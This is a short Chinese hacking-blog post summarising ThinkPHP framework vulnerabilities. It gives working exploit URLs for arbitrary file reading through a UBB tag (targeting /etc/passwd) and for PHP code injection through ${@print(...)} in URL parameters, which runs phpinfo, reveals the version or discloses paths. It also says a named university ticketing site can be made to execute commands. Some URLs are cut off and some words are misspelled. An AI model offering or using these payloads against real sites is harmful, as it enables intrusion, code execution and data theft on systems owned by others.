Thinkphp 漏洞小结

分类:安全 | 2016-06-14 | 撸过 577 次
5人扯谈

首先确定这个网站使用thinkphp的框架

国内很多php开源项目的代码都是使用thinkphp框架编写的,但是thinkphp框架有很多版本,如何才能知道我们使用的框架是哪个版本的呢?

在URL后面加thinkphp的目录,也有可能爆出来

这是一个tankphp的网站目录。供参考

  • admin是后台工程文件夹
  • home是前台工程
  • public里面用于存放CSS文件,JS文件以及网页里面的图片
  • ThinkPHP框架
  • ueditor是百度编辑器

ThinkPHP的Ubb标签漏洞读取任意内容

http://webshell.cc/index/?path=[code]/etc/passwd[/code]

附图

Thinkphp2

 

 

hinkphp 3.0 爆路径漏洞

1. thinkphp3.0 模块加载失败,出错信息爆应用程序路径。

检测有两种情况

1. 可执行命令,这个估计是伪3.0版本?

交大定票

此站到可以执行命令

http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D

可查看版本

http://webshell.cc/index.php/module/action/param1/$%7B@print(phpinfo())%7D

可查看phpinfo信息

2. 不可执行命令,爆路径

http://webshell.cc/appscn/index.php/module/action/param1/$%7B@print(phpinfo())%7
http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7
http://webshell.cc/index.php/module/action/module/param1/$%7B@print(THINK_VERSION)%7D
本站内容均为原创,转载请务必保留署名与链接!
Thinkphp 漏洞小结:https://www.webshell.cc/4729.html

随机日志

  1. 今天居然更新了,我是多巧合的点进来看了下。

    • 服务器也换了.系统也更新了,3.X不能升级4.X,好一顿折腾!

  2. 都期待你回来呢。没什么新内容新工具看了。全靠你了。